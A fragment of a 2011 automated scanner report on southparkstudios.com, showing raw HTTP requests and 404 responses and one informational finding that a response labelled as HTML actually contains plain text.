Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; southpark_u=1; southpark_username=Anonymous; southpark_sid=608cb90aa087ada1f5f6450eab76d9b5; southpark_k=; mbox=check#true#1303242733|session#1303242631302-17636#1303244533; s_nr=1303242672125; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 14
Content-Type: text/html
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:50:31 GMT
Connection: close

File Not Found

11.2. http://www.southparkstudios.com/layout/skin_v3jq/css/img/upload/upload_logo_big.jpg  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.southparkstudios.com
Path:   /layout/skin_v3jq/css/img/upload/upload_logo_big.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /layout/skin_v3jq/css/img/upload/upload_logo_big.jpg HTTP/1.1
Host: www.southparkstudios.com
Proxy-Connection: keep-alive
Referer: http://www.southparkstudios.com/account/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; __qca=P0-782518941-1303242631379; mtvn_guid=1303242589-949; s_ppv=100; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D1189; mbox=check#true#1303242727|session#1303242631302-17636#1303244527; s_nr=1303242666203; s_cc=true; s_sq=viacomedycentral%2Cviasouthparkstudios%3D%2526pid%253Dshows%25252Fsouthparkstudios%25252Fguide%25252Fepisodes%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.southparkstudios.com%25252Faccount%25252Flogin%2526ot%253DA; southpark_u=1; southpark_username=Anonymous; southpark_sid=608cb90aa087ada1f5f6450eab76d9b5; southpark_k=

Response

HTTP/1.0 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 14
Content-Type: text/html
Cache-Control: max-age=600
Date: Tue, 19 Apr 2011 19:50:30 GMT
Connection: close

File Not Found

Report generated by XSS.CX at Tue Apr 19 14:54:03 CDT 2011.